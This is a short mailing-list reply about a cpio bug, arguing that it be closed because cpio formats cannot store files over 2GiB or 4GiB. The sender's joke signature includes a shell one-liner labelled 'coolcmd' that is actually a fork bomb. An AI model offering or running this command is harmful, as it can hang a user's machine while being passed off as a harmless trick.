This bug should probably be closed. The default cpio format doesn't support
>2GiB files. Some other formats only support 4GiB, and the file in this
report is >4GiB.

See:
https://en.wikipedia.org/wiki/Cpio#POSIX_standardization
https://www.systutorials.com/docs/linux/man/1-cpio/

-- 
typedef struct me_s {
 char name[]      = { "Thomas Habets" };
 char email[]     = { "tho...@habets.se <tho...@habets.pp.se>" };
 char kernel[]    = { "Linux" };
 char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
 char pgp[] = { "9907 8698 8A24 F52F 1C2E  87F6 39A4 9EEA 460A 0169" };
 char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

Reply via email to